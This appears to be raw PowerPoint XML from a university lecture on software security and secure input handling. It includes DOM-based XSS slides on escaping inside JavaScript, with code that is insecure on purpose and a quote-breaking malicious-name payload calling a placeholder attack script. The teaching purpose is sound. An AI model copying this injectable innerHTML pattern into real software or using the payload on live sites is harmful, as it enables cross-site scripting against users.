              <a:gd name="connsiteX8" fmla="*/ 838200 w 2805927"/>
              <a:gd name="connsiteY8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914400 w 2805927"/>
              <a:gd name="connsiteY2" fmla="*/ 358140 h 919110"/>
              <a:gd name="connsiteX3" fmla="*/ 2735580 w 2805927"/>
              <a:gd name="connsiteY3" fmla="*/ 906780 h 919110"/>
              <a:gd name="connsiteX4" fmla="*/ 2415540 w 2805927"/>
              <a:gd name="connsiteY4" fmla="*/ 746760 h 919110"/>
              <a:gd name="connsiteX5" fmla="*/ 2263140 w 2805927"/>
              <a:gd name="connsiteY5" fmla="*/ 822960 h 919110"/>
              <a:gd name="connsiteX6" fmla="*/ 1874520 w 2805927"/>
              <a:gd name="connsiteY6" fmla="*/ 861060 h 919110"/>
              <a:gd name="connsiteX7" fmla="*/ 838200 w 2805927"/>
              <a:gd name="connsiteY7" fmla="*/ 845820 h 919110"/>
              <a:gd name="connsiteX0" fmla="*/ 67620 w 2922569"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 924287"/>
              <a:gd name="connsiteX1" fmla="*/ 242880 w 2922569"/>
              <a:gd name="connsiteY1" fmla="*/ 259080 h 924287"/>
              <a:gd name="connsiteX2" fmla="*/ 2803200 w 2922569"/>
              <a:gd name="connsiteY2" fmla="*/ 906780 h 924287"/>
              <a:gd name="connsiteX3" fmla="*/ 2483160 w 2922569"/>
              <a:gd name="connsiteY3" fmla="*/ 746760 h 924287"/>
              <a:gd name="connsiteX4" fmla="*/ 2330760 w 2922569"/>
              <a:gd name="connsiteY4" fmla="*/ 822960 h 924287"/>
              <a:gd name="connsiteX5" fmla="*/ 1942140 w 2922569"/>
              <a:gd name="connsiteY5" fmla="*/ 861060 h 924287"/>
              <a:gd name="connsiteX6" fmla="*/ 905820 w 2922569"/>
              <a:gd name="connsiteY6" fmla="*/ 845820 h 924287"/>
              <a:gd name="connsiteX0" fmla="*/ 67620 w 2901467"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 935005"/>
              <a:gd name="connsiteX1" fmla="*/ 242880 w 2901467"/>
              <a:gd name="connsiteY1" fmla="*/ 259080 h 935005"/>
              <a:gd name="connsiteX2" fmla="*/ 2803200 w 2901467"/>
              <a:gd name="connsiteY2" fmla="*/ 906780 h 935005"/>
              <a:gd name="connsiteX3" fmla="*/ 2330760 w 2901467"/>
              <a:gd name="connsiteY3" fmla="*/ 822960 h 935005"/>
              <a:gd name="connsiteX4" fmla="*/ 1942140 w 2901467"/>
              <a:gd name="connsiteY4" fmla="*/ 861060 h 935005"/>
              <a:gd name="connsiteX5" fmla="*/ 905820 w 2901467"/>
              <a:gd name="connsiteY5" fmla="*/ 845820 h 935005"/>
              <a:gd name="connsiteX0" fmla="*/ 34651 w 2297790"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 862284"/>
              <a:gd name="connsiteX1" fmla="*/ 209911 w 2297790"/>
              <a:gd name="connsiteY1" fmla="*/ 259080 h 862284"/>
              <a:gd name="connsiteX2" fmla="*/ 2297791 w 2297790"/>
              <a:gd name="connsiteY2" fmla="*/ 822960 h 862284"/>
              <a:gd name="connsiteX3" fmla="*/ 1909171 w 2297790"/>
              <a:gd name="connsiteY3" fmla="*/ 861060 h 862284"/>
              <a:gd name="connsiteX4" fmla="*/ 872851 w 2297790"/>
              <a:gd name="connsiteY4" fmla="*/ 845820 h 862284"/>
              <a:gd name="connsiteX0" fmla="*/ 8685 w 1883206"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 862284"/>
              <a:gd name="connsiteX1" fmla="*/ 183945 w 1883206"/>
              <a:gd name="connsiteY1" fmla="*/ 259080 h 862284"/>
              <a:gd name="connsiteX2" fmla="*/ 1883205 w 1883206"/>
              <a:gd name="connsiteY2" fmla="*/ 861060 h 862284"/>
              <a:gd name="connsiteX3" fmla="*/ 846885 w 1883206"/>
              <a:gd name="connsiteY3" fmla="*/ 845820 h 862284"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 838200"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 845820"/>
              <a:gd name="connsiteX1" fmla="*/ 175260 w 838200"/>
              <a:gd name="connsiteY1" fmla="*/ 259080 h 845820"/>
              <a:gd name="connsiteX2" fmla="*/ 838200 w 838200"/>
              <a:gd name="connsiteY2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45820">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="55880" y="107950"/>
                  <a:pt x="35560" y="118110"/>
                  <a:pt x="175260" y="259080"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="314960" y="400050"/>
                  <a:pt x="700088" y="723583"/>
                  <a:pt x="838200" y="84582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1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20" grpId="0"/>
      <p:bldP spid="21" grpId="0" animBg="1"/>
      <p:bldP spid="34" grpId="0"/>
      <p:bldP spid="48" grpId="0" animBg="1"/>
      <p:bldP spid="50" grpId="0"/>
      <p:bldP spid="5" grpId="0" animBg="1"/>
      <p:bldP spid="10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2C1EFA96-4E2D-70AC-A944-FBBFA98D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Escaping inside JavaScript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5F36A-6450-FA78-D4E2-17F77A4B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8133120" cy="49593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dirty="0"/>
              <a:t>Suppose we want JS code to create/change an HTML element </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>elem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t> into a link, labelled with a user-supplied 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,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t> that executes JS code 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('name') </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>when clicked, i.e.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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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&lt;/a&gt;   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>Insecure JS code to do this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
          </a:p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';</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="900" b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1600" i="1" dirty="0"/>
              <a:t>Spot the XSS bug!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i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              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>As malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  name  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>insert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34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' ';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someAttackScript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(); //</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1600" b="1" i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sz="1600" i="1" dirty="0"/>
              <a:t>How to escape </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" i="1" dirty="0"/>
              <a:t> for the two different contexts here?     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1600" b="1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);  // HTML-encoding  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escapeString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); // JS string literal encoding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="18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altLang="en-US" sz="1600" i="1" dirty="0"/>
              <a:t>Spot the XSS bug!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"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latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1600" b="1" i="1" dirty="0">
              <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71684" name="Tijdelijke aanduiding voor dianummer 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54CE8487-0EC1-7FCC-F878-1894E2393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4BC0E51-D315-45F1-A16A-CE3CC1D417D6}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL"/>
              <a:pPr/>
              <a:t>98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2C1EFA96-4E2D-70AC-A944-FBBFA98D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Spot the XSS bug!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5F36A-6450-FA78-D4E2-17F77A4B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8133120" cy="49593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 var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htmlEscape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);  // HTML-encoding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var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 err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>goog.string.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escapeString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0"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); // JS string literal encoding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="18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b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>elem.innerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> =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&lt;a onclick=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GB" sz="16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(\'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204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jsEscapedName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\')"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escapedName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> +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&lt;/a&gt;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00" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34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907" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="16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907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Attack: enter malicious name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>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');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HTML-escaped this becomes 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JS-escaped this remains                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</a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1633" dirty="0"/>
              <a:t>So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  <a:r>
              <a:rPr lang="en-US" sz="1633" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>innerHTML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  <a:r>
              <a:rPr lang="en-US" sz="1633" dirty="0"/>
              <a:t>becomes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1633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633" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>                 &lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1633" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>onclick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1633" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>= 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"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1633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createAlbum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(' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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US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US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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1633" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>')"&gt;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&amp;#39;);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633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();//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;/a&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0"/>
              <a:t>The browser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTML-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unescapes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> value of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onclick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> attribute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0"/>
              <a:t>before evaluation as JS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b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>                                      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createAlbum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(' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" b="1" dirty="0" err="1"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latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>();//')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33" dirty="0"/>
              <a:t>so</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>attackScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>();  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0"/>
              <a:t>will be executed</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1633" b="1" dirty="0">
              <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71684" name="Tijdelijke aanduiding voor dianummer 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54CE8487-0EC1-7FCC-F878-1894E2393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4BC0E51-D315-45F1-A16A-CE3CC1D417D6}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL"/>
              <a:pPr/>
              <a:t>99</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" alt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A4A0E4-DBAD-0A0F-FA0A-91200DE8A75F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2195736" y="5704715"/>
            <a:ext cx="63686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[Example from Christoph Kern, Securing the Tangled Web, CACM 2014]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38713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ss b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ngepast 1">
      <a:majorFont>
        <a:latin typeface="Arial Rounded MT Bold"/>
        <a:ea typeface="DejaVu Sans"/>
        <a:cs typeface="DejaVu Sans"/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Arial Rounded MT Bold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41034</TotalTime>
  <Words>8809</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>1428</Paragraphs>
  <Slides>111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24" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Arial Narrow</vt:lpstr>
      <vt:lpstr>Arial Rounded MT Bold</vt:lpstr>
      <vt:lpstr>Bahnschrift</vt:lpstr>
      <vt:lpstr>Comic Sans MS</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>DejaVu Sans</vt:lpstr>
      <vt:lpstr>Ink Free</vt:lpstr>
      <vt:lpstr>Pieces NFI</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>1_Office Theme</vt:lpstr>
      <vt:lpstr>Security bugs of the week</vt:lpstr>
      <vt:lpstr>Software Security Secure Input Handling  </vt:lpstr>
      <vt:lpstr>memory corruption, injection attacks, access control / authentication</vt:lpstr>
      <vt:lpstr>Recap: The big three</vt:lpstr>
      <vt:lpstr> INPUT problems     </vt:lpstr>
      <vt:lpstr>High level observations</vt:lpstr>
      <vt:lpstr>Attack surface for  input problems</vt:lpstr>
      <vt:lpstr>Attack surface for  input problems</vt:lpstr>
      <vt:lpstr>Terminology</vt:lpstr>
      <vt:lpstr> Understanding root causes  of  INPUT problems     </vt:lpstr>
      <vt:lpstr>Recurring themes: parsing &amp; languages</vt:lpstr>
      <vt:lpstr>Two kinds of problems: bugs vs features</vt:lpstr>
      <vt:lpstr>Buggy parsing  vs Unintended parsing</vt:lpstr>
      <vt:lpstr>Buggy parsing (1) : insecure parsing</vt:lpstr>
      <vt:lpstr>Buggy parsing (2): incorrect parsing</vt:lpstr>
      <vt:lpstr>Buggy parsing (3): unwanted parsing</vt:lpstr>
      <vt:lpstr>Typical injection attack, eg SQLi</vt:lpstr>
      <vt:lpstr>Injection attacks</vt:lpstr>
      <vt:lpstr>LDAP injection</vt:lpstr>
      <vt:lpstr>XPath injection</vt:lpstr>
      <vt:lpstr>Blind injection attacks</vt:lpstr>
      <vt:lpstr>More injection attacks</vt:lpstr>
      <vt:lpstr>More obscure injection attacks on Microsoft Office</vt:lpstr>
      <vt:lpstr>DDE warnings in Office</vt:lpstr>
      <vt:lpstr>SMB relays: Injection attacks via Windows file names</vt:lpstr>
      <vt:lpstr>Eval</vt:lpstr>
      <vt:lpstr>(De)serialisation  </vt:lpstr>
      <vt:lpstr>Deserialisation attacks in Java</vt:lpstr>
      <vt:lpstr>Deserialisation attacks in Java</vt:lpstr>
      <vt:lpstr>Log4J attack</vt:lpstr>
      <vt:lpstr>JNDI (Java Naming and Directory Interface)</vt:lpstr>
      <vt:lpstr>The Log4J attack</vt:lpstr>
      <vt:lpstr>Example data exfiltration using Log4J</vt:lpstr>
      <vt:lpstr>Social Engineering as injection attacks?</vt:lpstr>
      <vt:lpstr>Preventing  INPUT problems   </vt:lpstr>
      <vt:lpstr>Why so many &amp; such tricky input problems?</vt:lpstr>
      <vt:lpstr> Audience poll</vt:lpstr>
      <vt:lpstr>Preventing input handling problems</vt:lpstr>
      <vt:lpstr>I. The three basic protection mechanisms</vt:lpstr>
      <vt:lpstr>Canonicalisation, Validation, Sanitisation</vt:lpstr>
      <vt:lpstr>a)   Canonicalisation (aka Normalisation)</vt:lpstr>
      <vt:lpstr>a)  Canonicalisation</vt:lpstr>
      <vt:lpstr>b)  Validation</vt:lpstr>
      <vt:lpstr>b) Validation techniques</vt:lpstr>
      <vt:lpstr>c) Sanitisation aka encoding</vt:lpstr>
      <vt:lpstr>Validation patterns can get  COMPLEX            </vt:lpstr>
      <vt:lpstr>Parse, don’t validate!</vt:lpstr>
      <vt:lpstr>Spot the defect  </vt:lpstr>
      <vt:lpstr>Parse, don't validate?</vt:lpstr>
      <vt:lpstr>Sanitisation nightmares: XSS</vt:lpstr>
      <vt:lpstr>Where to canonicalise, valididate or sanitise:</vt:lpstr>
      <vt:lpstr>Trust boundaries &amp; choke points</vt:lpstr>
      <vt:lpstr> II.  Tackling insecure &amp; incorrect parsing - using the LangSec approach</vt:lpstr>
      <vt:lpstr>Buggy parsing (1 &amp; 2)</vt:lpstr>
      <vt:lpstr>Can we use input validation?</vt:lpstr>
      <vt:lpstr>LangSec (Language-Theoretic Security)     </vt:lpstr>
      <vt:lpstr>Root causes / anti-patterns</vt:lpstr>
      <vt:lpstr>Anti-pattern: shotgun parser</vt:lpstr>
      <vt:lpstr>LangSec concepts</vt:lpstr>
      <vt:lpstr>LangSec principles to prevent buggy parsing  </vt:lpstr>
      <vt:lpstr>Preventing buggy parsing - the LangSec way</vt:lpstr>
      <vt:lpstr>LangSec in slogans</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr> III.     How (not) to prevent  unintended/unwanted parsing, i.e. injection attacks</vt:lpstr>
      <vt:lpstr>How &amp; where to prevent injection attacks?</vt:lpstr>
      <vt:lpstr>Input validation ?</vt:lpstr>
      <vt:lpstr>Input  sanitisation?</vt:lpstr>
      <vt:lpstr>Multiple backends/APIs introduce multiple contexts </vt:lpstr>
      <vt:lpstr>Output  sanitisation! aka output encoding </vt:lpstr>
      <vt:lpstr>Output encoding to prevent injection attacks</vt:lpstr>
      <vt:lpstr>a) Prepared Statements</vt:lpstr>
      <vt:lpstr>Dynamic SQL vs Prepared statements </vt:lpstr>
      <vt:lpstr>Dynamic SQL &amp; prepared statements in Java   </vt:lpstr>
      <vt:lpstr>The idea behind prepared statemens (aka parameterised queries) </vt:lpstr>
      <vt:lpstr>Prepared Statements as solution to SQLi</vt:lpstr>
      <vt:lpstr>Limitation of this approach, more generally</vt:lpstr>
      <vt:lpstr>Prepared Statements not quite fool-proof</vt:lpstr>
      <vt:lpstr>b) Tainting</vt:lpstr>
      <vt:lpstr>Tainting aka Taint analysis</vt:lpstr>
      <vt:lpstr>Dynamic &amp; static taint analysis  </vt:lpstr>
      <vt:lpstr>Tainting limitations?</vt:lpstr>
      <vt:lpstr>c) Safe builders</vt:lpstr>
      <vt:lpstr> Safe Builder approach</vt:lpstr>
      <vt:lpstr>Safe builder for SQL injection  </vt:lpstr>
      <vt:lpstr>Safe builders for several contexts</vt:lpstr>
      <vt:lpstr>Positive vs negative security models</vt:lpstr>
      <vt:lpstr>The messy business of preventing XSS  </vt:lpstr>
      <vt:lpstr>Reflected XSS attack</vt:lpstr>
      <vt:lpstr>Stored XSS attack</vt:lpstr>
      <vt:lpstr>Encoding for the web - server-side</vt:lpstr>
      <vt:lpstr>Encoding for the web - server-side  </vt:lpstr>
      <vt:lpstr>Some of the encodings for the web  </vt:lpstr>
      <vt:lpstr>Context-sensitive auto-escaping  </vt:lpstr>
      <vt:lpstr>Extra complication: the DOM API</vt:lpstr>
      <vt:lpstr>DOM-based XSS attacks</vt:lpstr>
      <vt:lpstr>Escaping inside JavaScript</vt:lpstr>
      <vt:lpstr>Spot the XSS bug!</vt:lpstr>
      <vt:lpstr>Preventing DOM-based XSS</vt:lpstr>
      <vt:lpstr> API hardening for the DOM API (aka Trusted Types)</vt:lpstr>
      <vt:lpstr> Custom tweaks   </vt:lpstr>
      <vt:lpstr>Yet another complication:  different kind of URLs</vt:lpstr>
      <vt:lpstr>Conclusions</vt:lpstr>
      <vt:lpstr>Languages &amp; Parsing</vt:lpstr>
      <vt:lpstr>Validation vs  Sanitisation/Encoding/Escaping</vt:lpstr>
      <vt:lpstr>Anti-pattern:  string concatenation</vt:lpstr>
      <vt:lpstr>Anti-pattern:  strings</vt:lpstr>
      <vt:lpstr>Pattern: Use Types</vt:lpstr>
      <vt:lpstr>To read</vt:lpstr>
      <vt:lpstr>Getting things wrong: double en/decodings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Poll, E. (Erik)</cp:lastModifiedBy>
  <cp:revision>497</cp:revision>
  <cp:lastPrinted>1601-01-01T00:00:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">1601-01-01T00:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-07T05:40:26Z</dcterms:modified>
</cp:coreProperties>
</file>